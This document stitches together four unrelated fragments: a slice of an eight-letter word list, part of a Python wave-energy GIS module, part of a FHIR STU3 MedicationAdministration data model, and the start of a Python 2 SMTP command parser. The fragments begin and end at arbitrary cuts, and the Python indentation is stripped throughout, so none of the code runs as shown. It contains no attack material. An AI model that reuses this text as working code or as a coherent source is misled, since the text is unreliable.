"ensample",
"ensconce",
"enscroll",
"enserfed",
"ensheath",
"enshrine",
"enshroud",
"ensiform",
"ensigncy",
"ensilage",
"ensiling",
"enskying",
"enslaver",
"enslaves",
"ensnared",
"ensnarer",
"ensnares",
"ensnarls",
"ensorcel",
"ensouled",
"ensphere",
"ensurers",
"enswathe",
"entailer",
"entameba",
"entangle",
"entasias",
"entastic",
"entellus",
"ententes",
"enterers",
"enterics",
"enterons",
"enthetic",
"enthrall",
"enthrals",
"enthrone",
"enthuses",
"enticers",
"entoderm",
"entoiled",
"entozoal",
"entozoan",
"entozoic",
"entozoon",
"entrains",
"entreats",
"entreaty",
"entrench",
"entrepot",
"entresol",
"entrusts",
"entwines",
"entwists",
"enureses",
"enuresis",
"enuretic",
"envelops",
"envenoms",
"enviably",
"enwheels",
"enwombed",
"enzootic",
"eobionts",
"eohippus",
"eolipile",
"eolithic",
"eolopile",
"epaulets",
"epazotes",
"epeeists",
"ependyma",
"epergnes",
"ephedras",
"ephedrin",
"ephorate",
"epiblast",
"epibolic",
"epically",
"epicalyx",
"epicarps",
"epicedia",
"epicenes",
"epiclike",
"epicotyl",
"epicures",
"epicycle",
"epiderms",
"epidotes",
"epidotic",
"epifauna",
"epifocal",
"epigenic",
"epigeous",
"epigones",
"epigonic",
"epigonus",
"epigrams",
"epigraph",
"epilated",
"epilates",
"epimeres",
"epimeric",
"epimysia",
"epinasty",
"epiphyte",
"episcias",
"episcope",
"episomal",
"episomes",
"epistasy",
"epistler",
"epistome",
"epistyle",
"epitaphs",
"epitases",
"epitasis",
"epitaxic",
"epitomes",
"epitomic",
"epizoism",
"epizoite",
"epizooty",
"eponymic",
"epopoeia",
"epoxides",
"epoxying",
"epsilons",
"equalise",
"equators",
"equinely",
"equinity",
"equipage",
"equipper",
"equiseta",
"equitant",
"equivoke",
"eradiate",
"erasions",
"erasures",
"erecters",
"erective",
"eremites",
"eremitic",
"eremurus",
"erepsins",
"erethism",
"erewhile",
"ergastic",
"ergative",
"ergotism",
"erigeron",
"eringoes",
"eristics",
"erlkings",
"erodable",
"erodible",
"erogenic",
"erosible",
"erosions",
"erotical",
"erotisms",
"erotized",
"erotizes",
"errantly",
"errantry",
"erratics",
"errhines",
"erringly",
"ersatzes",
"eructate",
"eructing",
"erumpent",
"eryngoes",
"erythron",
"escallop",
"escalope",
"escalops",
"escapees",
"escapers",
"escargot",
"escarole",
"escarped",
"eschalot",
"escheats",
"eschewal",
"eschewed",
"eschewer",
"escolars",
"escoting",
"escrowed",
"escuages",
"esculent",
"eserines",
"esophagi",
"espalier",
"espartos",
"espiegle",
"espousal",
"espouser",
"espouses",
"esquired",
"esquires",
"essayers",
"essaying",
"essonite",
"estating",
"esterify",
"estheses",
"esthesia",
"esthesis",
"esthetes",
"estivate",
"estopped",
"estovers",
"estragon",
"estrange",
"estrayed",
"estreats",
"estriols",
"estrones",
"estruses",
"esurient",
"etageres",
"etamines",
"etatisms",
"etchants",
"eternals",
"eternise",
"eternize",
"etesians",
"ethanols",
"ethephon",
"etherify",
"etherish",
"etherize",
"ethicals",
"ethician",
"ethicize",
"ethinyls",
"ethmoids",
"ethnarch",
"ethnical",
"ethnonym",
"ethnoses",
"ethogram",
"ethoxies",
"ethoxyls",
"ethylate",
"ethynyls",
"etiolate",
"etouffee",
"eucaines",
"eucalypt",
"eucharis",
"euchring",
"euclases",
"eucrites",
"eucritic",
"eudaemon",
"eudaimon",
"eudemons",
"eugenias",
"eugenist",
"eugenols",
"euglenas",
"euglenid",
"eulachan",
"eulachon",
"eulogiae",
"eulogias",
"eulogies",
"eulogise",
"eulogist",
"eulogium",
"eulogize",
"euonymus",
"eupatrid",
"eupepsia",
"eupeptic",
"euphenic",
"euphonic",
"euphotic",
"euphrasy",
"euphroes",
"euphuism",
"euphuist",
"euploids",
"euploidy",
"eupnoeas",
"eupnoeic",
"eurokies",
"eurokous",
"europium",
"eurybath",
"eurythmy",
"eusocial",
"eustatic",
"eusteles",
"eutaxies",
"eutectic",
"eutrophy",
"euxenite",
"evacuant",
"evadable",
"evadible",
"evanesce",
"evangels",
"evasions",
"evection",
"evenfall",
"evenness",
"evensong",
"eversion",
"everting",
"evertors",
"everymen",
"everyway",
"evictees",
"evicting",
"evictors",
"evildoer",
"evillest",
"evilness",
"evincing",
"evincive",
"evitable",
"evocable",
"evocator",
"evolutes",
"evolvers",
"evonymus",
"evulsing",
"evulsion",
"exabytes",
"exacters",
"exactest",
"exaction",
"exactors",
"exahertz",
"exalters",
"exalting",
"examinee",
"exampled",
"exanthem",
"exaptive",
"exarchal",
"exceeder",
"excessed",
"exciding",
"excimers",
"exciples",
"excising",
"excitant",
"exciters",
"excitons",
"excitors",
"exclaves",
"excluder",
"excretal",
"excreter",
"excretes",
"excursus",
"excusers",
"execrate",
"executer",
"exegeses",
"exegetes",
"exegetic",
"exemplum",
"exequial",
"exequies",
"exergual",
"exergues",
"exertive",
"exhalant",
"exhalent",
"exhaling",
"exhedrae",
"exhorter",
"exhumers",
"exhuming",
"exigence",
"exigency",
"exigible",
"exiguity",
"exiguous",
"exilable",
"eximious",
"exitless",
"exocarps",
"exocrine",
"exocytic",
"exoderms",
"exoduses",
"exoergic",
"exogamic",
"exonumia",
"exorable",
"exorcise",
"exorcize",
"exordial",
"exordium",
"exosmose",
"exospore",
"exoteric",
"exotisms",
"exotoxic",
"exotoxin",
"expandor",
"expecter",
"expellee",
"expeller",
"expender",
"experted",
"expiable",
"expiated",
"expiates",
"expiator",
"expirers",
"expiries",
"explants",
"exploder",
"exposals",
"exposers",
"exposits",
"expounds",
"expulsed",
"expulses",
"expunger",
"expunges",
"exscinds",
"exsecant",
"exsected",
"exserted",
"externes",
"extincts",
"extolled",
"extoller",
"extorted",
"extorter",
"extrados",
"extremer",
"extremum",
"extrorse",
"extrudes",
"extubate",
"exudates",
"exultant",
"exulting",
"exurbias",
"exuviate",
"eyebeams",
"eyeblack",
"eyeblink",
"eyebolts",
"eyedness",
"eyedrops",
"eyefolds",
"eyeholes",
"eyehooks",
"eyelifts",
"eyepoint",
"eyeshade",
"eyeshine",
"eyeshots",
"eyesores",
"eyespots",
"eyestalk",
"eyestone",
"eyeteeth",
"eyetooth",
"eyewater",
"eyewinks",
"fabliaux",
"fabulate",
"fabulist",
"faceable",
"facedown",
"facemask",
"facetely",
"facetiae",
"faceting",
"facetted",
"facially",
"faciends",
"facilely",
"factious",
"factotum",
"factures",
"faddiest",
"faddisms",
"faddists",
"fadeless",
"fadeouts",
"faggiest",
"faggoted",
"faggotry",
"fagoters",
"fagoting",
"fahlband",
"faiences",
"faineant",
"fainters",
"faintish",
"fairgoer",
"fairings",
"fairlead",
"fairyism",
"faithing",
"faitours",
"fakeries",
"falafels",
"falbalas",
| |
base_dict_data in well-known text format.
target_sr_wkt (str): target spatial reference in well-known text format
Returns:
None
"""
# If the target_vector_path exists delete it
if os.path.isfile(target_vector_path):
driver = ogr.GetDriverByName(_VECTOR_DRIVER_NAME)
driver.DeleteDataSource(target_vector_path)
base_sr = osr.SpatialReference()
base_sr.ImportFromWkt(base_sr_wkt)
target_sr = osr.SpatialReference()
target_sr.ImportFromWkt(target_sr_wkt)
# Get coordinate transformation from base spatial reference to target,
# in order to transform wave points to target_sr
coord_trans, _ = _get_coordinate_transformation(base_sr, target_sr)
LOGGER.info('Creating new vector')
output_driver = ogr.GetDriverByName(_VECTOR_DRIVER_NAME)
output_vector = output_driver.CreateDataSource(target_vector_path)
target_layer = output_vector.CreateLayer(str(layer_name), target_sr,
ogr.wkbPoint)
# Construct a dictionary of field names and their corresponding types
field_dict = {
'ID': ogr.OFTInteger,
'TYPE': ogr.OFTString,
'LAT': ogr.OFTReal,
'LONG': ogr.OFTReal,
'LOCATION': ogr.OFTString
}
LOGGER.info('Creating fields for the vector')
for field_name in ['ID', 'TYPE', 'LAT', 'LONG', 'LOCATION']:
target_field = ogr.FieldDefn(field_name, field_dict[field_name])
target_layer.CreateField(target_field)
LOGGER.info('Entering iteration to create and set the features')
# For each inner dictionary (for each point) create a point
for point_dict in base_dict_data.values():
latitude = float(point_dict['lat'])
longitude = float(point_dict['long'])
# When projecting to WGS84, extents -180 to 180 are used for longitude.
# In case input longitude is from -360 to 0 convert
if longitude < -180:
longitude += 360
geom = ogr.Geometry(ogr.wkbPoint)
geom.AddPoint_2D(longitude, latitude)
geom.Transform(coord_trans)
output_feature = ogr.Feature(target_layer.GetLayerDefn())
target_layer.CreateFeature(output_feature)
for field_name in point_dict:
output_feature.SetField(field_name, point_dict[field_name])
output_feature.SetGeometryDirectly(geom)
target_layer.SetFeature(output_feature)
output_feature = None
output_vector = None
LOGGER.info('Finished _dict_to_point_vector')
def _get_points_geometries(base_vector_path):
"""Retrieve the XY coordinates from a point shapefile.
The X and Y values from each point feature in the vector are stored in pair
as [x_location,y_location] in a numpy array.
Parameters:
base_vector_path (str): a path to an OGR vector file.
Returns:
an array of points, representing the geometry of each point in the
shapefile.
"""
points = []
base_vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)
base_layer = base_vector.GetLayer(0)
for feat in base_layer:
x_location = float(feat.GetGeometryRef().GetX())
y_location = float(feat.GetGeometryRef().GetY())
points.append([x_location, y_location])
feat = None
base_layer = None
base_vector = None
return numpy.array(points)
def _calculate_min_distances(xy_1, xy_2):
"""Calculate the shortest distances and indexes of points in xy_1 to xy_2.
For all points in xy_1, this function calculates the distance from point
xy_1 to various points in xy_2, and stores the shortest distances found in
a list min_dist. The function also stores the index from which ever point
in xy_2 was closest, as an id in a list that corresponds to min_dist.
Parameters:
xy_1 (numpy.array): An array of points in the form [x,y]
xy_2 (numpy.array): An array of points in the form [x,y]
Returns:
min_dist (numpy.array): An array of shortest distances for each point
in xy_1 to xy_2.
min_id (numpy.array): An array of indexes corresponding to the array
of shortest distances (min_dist).
"""
# Create two numpy array of zeros with length set to as many points in xy_1
min_dist = numpy.zeros(len(xy_1))
min_id = numpy.zeros(len(xy_1))
# For all points xy_point in xy_1 calculate the distance from xy_point to
# xy_2 and save the shortest distance found.
for idx, xy_point in enumerate(xy_1):
dists = numpy.sqrt(numpy.sum((xy_point - xy_2)**2, axis=1))
min_dist[idx], min_id[idx] = dists.min(), dists.argmin()
return min_dist, min_id
def _binary_wave_data_to_dict(wave_file_path):
"""Convert a pickled binary WW3 text file into a dictionary.
The dictionary's keys are the corresponding (I,J) values and the value is
a two-dimensional array representing a matrix of the number of hours a
seastate occurs over a 5 year period. The row and column fields are
extracted once and stored in the dictionary as well.
Parameters:
wave_file_path (str): path to a pickled binary WW3 file.
Returns:
wave_dict (dict): a dictionary of matrices representing hours of
specific seastates, as well as the period and height ranges.
It has the following structure:
{'periods': [1,2,3,4,...],
'heights': [.5,1.0,1.5,...],
'bin_matrix': { (i0,j0): [[2,5,3,2,...], [6,3,4,1,...],...],
(i1,j1): [[2,5,3,2,...], [6,3,4,1,...],...],
...
(in, jn): [[2,5,3,2,...], [6,3,4,1,...],...]
}
}
"""
LOGGER.info('Extrapolating wave data from text to a dictionary')
wave_file = open(wave_file_path, 'rb')
wave_dict = {}
# Create a key that hosts another dictionary where the matrix
# representation of the seastate bins will be saved
wave_dict['bin_matrix'] = {}
wave_array = None
wave_periods = []
wave_heights = []
key = None
# get rows,cols
row_col_bin = wave_file.read(8)
n_cols, n_rows = struct.unpack('ii', row_col_bin)
# get the periods and heights
line = wave_file.read(n_cols * 4)
wave_periods = list(struct.unpack('f' * n_cols, line))
line = wave_file.read(n_rows * 4)
wave_heights = list(struct.unpack('f' * n_rows, line))
key = None
while True:
line = wave_file.read(8)
if not line:
# end of file
wave_dict['bin_matrix'][key] = numpy.array(wave_array)
break
if key is not None:
wave_dict['bin_matrix'][key] = numpy.array(wave_array)
# Clear out array
wave_array = []
key = struct.unpack('ii', line)
for _ in itertools.repeat(None, n_rows):
line = wave_file.read(n_cols * 4)
array = list(struct.unpack('f' * n_cols, line))
wave_array.append(array)
wave_file.close()
# Add row/col field to dictionary
LOGGER.debug('WaveData col %s', wave_periods)
wave_dict['periods'] = numpy.array(wave_periods, dtype='f')
LOGGER.debug('WaveData row %s', wave_heights)
wave_dict['heights'] = numpy.array(wave_heights, dtype='f')
LOGGER.info('Finished extrapolating wave data to dictionary.')
return wave_dict
def _machine_csv_to_dict(machine_csv_path):
"""Create a dictionary from the table in machine csv file.
The dictionary's keys are the 'NAME' from the machine table and its values
are from the corresponding 'VALUE' field. No need to check for missing
columns since the file is validated by validate() function.
Parameters:
machine_csv_path (str): path to the input machine CSV file.
Returns:
machine_dict (dict): a dictionary of keys from the first column of the
CSV file and corresponding values from the `VALUE` column.
"""
machine_dict = {}
# make columns and indexes lowercased and strip whitespace
machine_data = utils.read_csv_to_dataframe(
machine_csv_path, to_lower=True, index_col=0)
machine_data.index = machine_data.index.str.strip()
machine_data.index = machine_data.index.str.lower()
# drop NaN indexed rows in dataframe
machine_data = machine_data[machine_data.index.notnull()]
LOGGER.debug('machine_data dataframe from %s: %s' %
(machine_csv_path, machine_data))
machine_dict = machine_data.to_dict('index')
for key in machine_dict.keys():
machine_dict[key] = machine_dict[key]['value']
return machine_dict
def _get_vector_spatial_ref(base_vector_path):
"""Get the spatial reference of an OGR vector (datasource).
Parameters:
base_vector_path (str): a path to an ogr vector
Returns:
spat_ref: a spatial reference
"""
vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)
layer = vector.GetLayer(0)
spat_ref = layer.GetSpatialRef()
layer = None
vector = None
return spat_ref
def _get_coordinate_transformation(source_sr, target_sr):
"""Create coordinate transformations between two spatial references.
One transformation is from source to target, and the other from target to
source.
Parameters:
source_sr (osr.SpatialReference): A spatial reference
target_sr (osr.SpatialReference): A spatial reference
Returns:
A tuple: coord_trans (source to target) and coord_trans_opposite
(target to source)
"""
coord_trans = osr.CoordinateTransformation(source_sr, target_sr)
coord_trans_opposite = osr.CoordinateTransformation(target_sr, source_sr)
return (coord_trans, coord_trans_opposite)
def _create_percentile_rasters(base_raster_path, target_raster_path,
units_short, units_long, percentile_list,
working_dir, start_value=None):
"""Create a percentile (quartile) raster based on the raster_dataset.
An attribute table is also constructed for the raster_dataset that displays
the ranges provided by taking the quartile of values.
Parameters:
base_raster_path (str): path to a GDAL raster with data of type
integer
target_raster_path (str): path to the destination of the new raster.
units_short (str): The shorthand for the units of the raster values,
ex: kW/m.
units_long (str): The description of the units of the raster values,
ex: wave power per unit width of wave crest length (kW/m).
percentile_list (list): A list of the _PERCENTILES ranges,
ex: [25, 50, 75, 90].
start_value (str): The first value that goes to the first percentile
range (start_value: percentile_one) (optional)
Returns:
None
"""
LOGGER.info('Creating Percentile Rasters')
temp_dir = tempfile.mkdtemp(dir=working_dir)
# If the target_raster_path is already a file, delete it
if os.path.isfile(target_raster_path):
os.remove(target_raster_path)
target_nodata = 255
base_raster_info = pygeoprocessing.get_raster_info(base_raster_path)
base_nodata = base_raster_info['nodata'][0]
base_dtype = base_raster_info['datatype']
def _mask_below_start_value(array):
valid_mask = (array != base_nodata) & (array >= float(start_value))
result = numpy.empty_like(array)
result[:] = base_nodata
result[valid_mask] = array[valid_mask]
return result
if start_value is not None:
masked_raster_path = os.path.join(
temp_dir, os.path.basename(base_raster_path))
pygeoprocessing.raster_calculator(
[(base_raster_path, 1)], _mask_below_start_value,
masked_raster_path, base_dtype, base_nodata)
input_raster_path = masked_raster_path
else:
input_raster_path = base_raster_path
# Get the percentile values for each percentile
percentile_values = pygeoprocessing.raster_band_percentile(
(input_raster_path, 1),
os.path.join(temp_dir, 'percentile'),
percentile_list)
shutil.rmtree(temp_dir, ignore_errors=True)
# Get the percentile ranges as strings so that they can be added to the
# output table. Also round them for readability.
value_ranges = []
rounded_percentiles = numpy.round(percentile_values, decimals=2)
# Add the first range with the starting value if it exists
if start_value:
value_ranges.append('%s to %s' % (start_value, rounded_percentiles[0]))
else:
value_ranges.append('Less than or equal to %s' % rounded_percentiles[0])
value_ranges += ['%s to %s' % (p, q) | |
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/MedicationAdministration
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from typing import Any, Dict
from typing import List as ListType
from pydantic import Field, root_validator
from . import backboneelement, domainresource, fhirtypes
class MedicationAdministration(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Administration of medication to a patient.
Describes the event of a patient consuming or otherwise being administered
a medication. This may be as simple as swallowing a tablet or it may be a
long running infusion. Related resources tie this event to the authorizing
prescription, and the specific encounter between patient and health care
practitioner.
"""
resource_type = Field("MedicationAdministration", const=True)
category: fhirtypes.CodeableConceptType = Field(
None,
alias="category",
title="Type of medication usage",
description=(
"Indicates the type of medication administration and where the "
"medication is expected to be consumed or administered."
),
# if property is element of this resource.
element_property=True,
)
context: fhirtypes.ReferenceType = Field(
None,
alias="context",
title="Encounter or Episode of Care administered as part of",
description=(
"The visit, admission or other contact between patient and health care "
"provider the medication administration was performed as part of."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Encounter", "EpisodeOfCare"],
)
definition: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="definition",
title="Instantiates protocol or definition",
description=(
"A protocol, guideline, orderset or other definition that was adhered "
"to in whole or in part by this event."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["PlanDefinition", "ActivityDefinition"],
)
device: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="device",
title="Device used to administer",
description=(
"The device used in administering the medication to the patient. For "
"example, a particular infusion pump."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Device"],
)
dosage: fhirtypes.MedicationAdministrationDosageType = Field(
None,
alias="dosage",
title="Details of how medication was taken",
description=(
"Describes the medication dosage information details e.g. dose, rate, "
"site, route, etc."
),
# if property is element of this resource.
element_property=True,
)
effectiveDateTime: fhirtypes.DateTime = Field(
None,
alias="effectiveDateTime",
title="Start and end time of administration",
description=(
"A specific date/time or interval of time during which the "
"administration took place (or did not take place, when the 'notGiven' "
"attribute is true). For many administrations, such as swallowing a "
"tablet the use of dateTime is more appropriate."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e effective[x]
one_of_many="effective",
one_of_many_required=True,
)
effectiveDateTime__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_effectiveDateTime",
title="Extension field for ``effectiveDateTime``.",
)
effectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="effectivePeriod",
title="Start and end time of administration",
description=(
"A specific date/time or interval of time during which the "
"administration took place (or did not take place, when the 'notGiven' "
"attribute is true). For many administrations, such as swallowing a "
"tablet the use of dateTime is more appropriate."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e effective[x]
one_of_many="effective",
one_of_many_required=True,
)
eventHistory: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="eventHistory",
title="A list of events of interest in the lifecycle",
description=(
"A summary of the events of interest that have occurred, such as when "
"the administration was verified."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Provenance"],
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="External identifier",
description=(
"External identifier - FHIR will generate its own internal identifiers "
"(probably URLs) which do not need to be explicitly managed by the "
"resource. The identifier here is one that would be used by another "
"non-FHIR system - for example an automated medication pump would "
"provide a record each time it operated; an administration while the "
"patient was off the ward might be made with a different system and "
"entered after the event. Particularly important if these records have"
" to be updated."
),
# if property is element of this resource.
element_property=True,
)
medicationCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="medicationCodeableConcept",
title="What was administered",
description=(
"Identifies the medication that was administered. This is either a link"
" to a resource representing the details of the medication or a simple "
"attribute carrying a code that identifies the medication from a known "
"list of medications."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e medication[x]
one_of_many="medication",
one_of_many_required=True,
)
medicationReference: fhirtypes.ReferenceType = Field(
None,
alias="medicationReference",
title="What was administered",
description=(
"Identifies the medication that was administered. This is either a link"
" to a resource representing the details of the medication or a simple "
"attribute carrying a code that identifies the medication from a known "
"list of medications."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e medication[x]
one_of_many="medication",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Medication"],
)
notGiven: bool = Field(
None,
alias="notGiven",
title="True if medication not administered",
description=(
"Set this to true if the record is saying that the medication was NOT "
"administered."
),
# if property is element of this resource.
element_property=True,
)
notGiven__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_notGiven", title="Extension field for ``notGiven``."
)
note: ListType[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Information about the administration",
description=(
"Extra information about the medication administration that is not "
"conveyed by the other attributes."
),
# if property is element of this resource.
element_property=True,
)
partOf: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="partOf",
title="Part of referenced event",
description="A larger event of which this particular event is a component or step.",
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["MedicationAdministration", "Procedure"],
)
performer: ListType[fhirtypes.MedicationAdministrationPerformerType] = Field(
None,
alias="performer",
title="Who administered substance",
description=(
"The individual who was responsible for giving the medication to the "
"patient."
),
# if property is element of this resource.
element_property=True,
)
prescription: fhirtypes.ReferenceType = Field(
None,
alias="prescription",
title="Request administration performed against",
description=(
"The original request, instruction or authority to perform the "
"administration."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["MedicationRequest"],
)
reasonCode: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="reasonCode",
title="Reason administration performed",
description="A code indicating why the medication was given.",
# if property is element of this resource.
element_property=True,
)
reasonNotGiven: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="reasonNotGiven",
title="Reason administration not performed",
description="A code indicating why the administration was not performed.",
# if property is element of this resource.
element_property=True,
)
reasonReference: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="reasonReference",
title=(
"Condition or Observation that supports why the medication was "
"administered"
),
description=(
"Condition or observation that supports why the medication was "
"administered."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Condition", "Observation"],
)
status: fhirtypes.Code = Field(
...,
alias="status",
title=(
"in-progress | on-hold | completed | entered-in-error | stopped | "
"unknown"
),
description=(
"Will generally be set to show that the administration has been "
"completed. For some long running administrations such as infusions it"
" is possible for an administration to be started but not completed or "
"it may be paused while some other process is under way."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=[
"in-progress",
"on-hold",
"completed",
"entered-in-error",
"stopped",
"unknown",
],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
subject: fhirtypes.ReferenceType = Field(
...,
alias="subject",
title="Who received medication",
description="The person or | |
from re import match
import sys
from socket import *
def parseReceiptToCmd(string, current_place, string_length):
if(string_length < 4):
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0
return 0
token = string[:4]
if (token == "RCPT"): # Checks if first text is "RCPT"
current_place = current_place + 4 #
pass #
else: # #
if(bool(match('MAIL(( )|(\t))+FROM:', string))): # # Checks for other commands to see if sequence
try: # # error exists
connectionSocket.send("503 Bad sequence of commands")
except:
print "Failed to send message"
return 0
return 0 # #
elif(bool(match('DATA(( )|(\t))*$', string))): # #
try:
connectionSocket.send("503 Bad sequence of commands")
except:
print "Failed to send message"
return 0
return 0 # #
else: #
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0 #
return 0 #
for x in range(current_place,string_length): # Allows any whitespace between "RCPT" and "TO:"
if (string[x] == " " or string[x] == "\t"): # Also checks to if text after "rcpt"
pass # starts with "T" in "TO:"
elif (string[x] == "T"): #
current_place = x #
break #
else: #
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0 #
return 0 #
token = string[current_place:current_place+3] # Verifies "TO:", case-insensitive
if(token == "TO:"): #
current_place = current_place+3 #
pass #
else: #
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0
return 0 #
for x in range(current_place, string_length): # Takes null space into effect and then locates
if (string[x] == " " or string[x] == "\t"): # start of path token
pass
else:
current_place = x
current_place = parsePath(string, current_place, string_length) # Next call
if (current_place == 0): # Error was deeper than rcpt-to-cmd so just return false
return 0
for x in range (current_place+1,string_length): # Allow nullspace afterwards
if (string[x] == " " or string[x] == "\t"):
pass
else:
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
connectionSocket.send("250 OK")
return 1
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
def parseDomain(string, current_place, string_length, least_2):
letter_first = True # This variable used to ensure that the first character in every element is a letter
domain_length = 0 # This variable is used to keep track of length
for x in range(current_place, string_length):
current_place = x
if(string[x] == "."): # Periods specify start of new domain
if(not least_2):
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
least_2 = False
current_place = x
if(current_place+2 > string_length): # Makes sure it doesn't end on period
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
return parseDomain(string, current_place+1, string_length, least_2) # Recursive call to check if elements come after periods. Any number of elements allowed.
elif((ord(string[x]) > 64 and ord(string[x]) < 91) or (ord(string[x]) > 96 and ord(string[x]) < 123) # Check to see if characters in elements are allowed
or (ord(string[x]) > 47 and ord(string[x]) < 58)):
if(letter_first):
if(ord(string[x]) > 64 and ord(string[x]) < 91) or (ord(string[x]) > 96 and ord(string[x]) < 123): # Letter check
letter_first = False
pass
else:
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
domain_length = domain_length +1 # Updating length
if(domain_length >= 2): # Now long enough to be accepted
least_2 = True
pass
elif(string[current_place] == " "): # Space needs to be explicitly checked as generally it is a different error
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
else:
if(least_2):
current_place = x
return current_place
else:
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
if(least_2 == True and letter_first == False):
return string_length-1
else:
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
def parseLocalPart(string, current_place, string_length):
local_part_length = 0
for x in range(current_place, string_length):
if (ord(string[x]) < 128 and ord(string[x]) != 32 and ord(string[x]) != 9 and ord(string[x]) != 34 and ord(string[x]) != 28 # Using asc2 values to identify if character in string
and ord(string[x]) != 29 and ord(string[x]) != 9 and (ord(string[x]) > 60 or ord(string[x]) < 58) # is allowed in grammar
and ord(string[x]) != 62 and ord(string[x]) != 64 and (ord(string[x]) > 93 or ord(string[x]) < 91)
and ord(string[x]) != 40 and ord(string[x]) != 41 and ord(string[x]) != 46 and ord(string[x]) != 44):
pass
local_part_length = local_part_length +1
elif(local_part_length > 0): # Grammar specifies there has to be at
current_place = x # least one character in local-part
return current_place
else:
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
def parseMailbox(string, current_place, string_length):
current_place = parseLocalPart(string, current_place, string_length) # Next call
if(current_place == None): # Signifies string is over
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
if(current_place == 0):
return 0
if(string[current_place] != "@"): # @ check
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
if(current_place+1 == string_length):
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
if(string[current_place+1] == " " or string[current_place+1] == "\t"): # Simple check for a space, which is a mailbox error,
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
least_2 = False # This variable appears in parseDomain parameters to check if there is at least on character in an element
current_place = parseDomain(string, current_place+1, string_length, least_2) # Next call
if(current_place == 0):
return 0
return current_place # End of this tree
def parsePath(string, current_place, string_length):
if(string[current_place] == "<"): # < check
current_place = current_place + 1
pass
else:
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
if(string[current_place] == " " or string[current_place] == "\t"): # Simple check for whitespace after <, which would be a path error, whereas any other
try: # character would be a local-part error and would be found later.
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
current_place = parseMailbox(string, current_place, string_length) # Next call
if(current_place == 0):
return 0
if(string[current_place] == ">"): # > check
return current_place
else:
try:
connectionSocket.send("501 Syntax error in parameters or arguments")
except:
print "Failed to send message"
return 0
return 0
def parseMailFromCmd(string, current_place, string_length):
if(string_length < 4):
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0
return 0
token = string[:4]
if (token == "MAIL"): # Checks if first text is "MAIL"
current_place = current_place + 4 #
pass #
else: #
if(bool(match('RCPT(( )|(\t))+TO:', string))): # # Checks for other commands to see if there
try:
connectionSocket.send("503 Bad sequence of commands")
except:
print "Failed to send message"
return 0
return 0 # #
elif(bool(match('DATA(( )|(\t))*$', string))): # #
try:
connectionSocket.send("503 Bad sequence of commands")
except:
print "Failed to send message"
return 0
return 0
